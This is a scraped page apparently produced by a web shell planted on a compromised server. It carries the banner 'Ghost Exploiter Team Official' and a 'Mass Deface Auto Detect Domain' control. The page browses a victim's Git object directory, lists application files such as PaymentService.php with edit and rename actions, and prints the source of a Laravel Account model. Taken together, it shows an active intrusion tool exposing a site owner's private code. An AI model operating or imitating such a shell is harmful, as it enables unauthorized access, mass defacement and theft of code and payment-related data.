Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
.git
/
objects
/
d3
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
311b4b8614eeb9a36c05dc5
...
0.814KB
edt
ren
Account.php
1.246KB
edt
ren
HashableInterface.php
0.621KB
edt
ren
ModelRepository.php
1.382KB
edt
ren
ORIG_HEAD
0.04KB
edt
ren
PaymentService.php
31.754KB
edt
ren
PhpProcess.php
2.438KB
edt
ren
README.md
1.836KB
edt
ren
app-20260128221314.php
4.229KB
edt
ren
app.php
4.229KB
edt
ren
c10d5af927dc099983b8f54
...
0.044KB
edt
ren
index.html
0.435KB
edt
ren
stash
0.04KB
edt
ren
web.php
0KB
edt
ren
<?php declare(strict_types=1); namespace App\Models; use Illuminate\Database\Eloquent\Model; use Illuminate\Database\Eloquent\Relations\BelongsTo; use Illuminate\Support\Carbon; /** * @property int $id * @property int $model_id * @property string $name * @property int $organization_id * @property float $deposit * @property Carbon|null $created_at * @property Carbon|null $updated_at * * @property-read Organization $organization */ class Account extends Model { protected $table = 'accounts'; protected $fillable = [ 'model_id', 'external_id', 'name', 'organization_id', 'deposit', 'number', 'archived', 'added', 'cor_number', 'balance_of_the_date', 'bank_name', 'bank_bic', 'bank_city', 'organization_name', 'is_cash', 'current_balance' ]; /** * Связь с моделью Organization. */ public function organization(): BelongsTo { return $this->belongsTo(Organization::class, 'organization_id'); } public function payments() { return $this->HasMany(Payment::class); } public function bank() { return $this->belongsTo(Bank::class); } }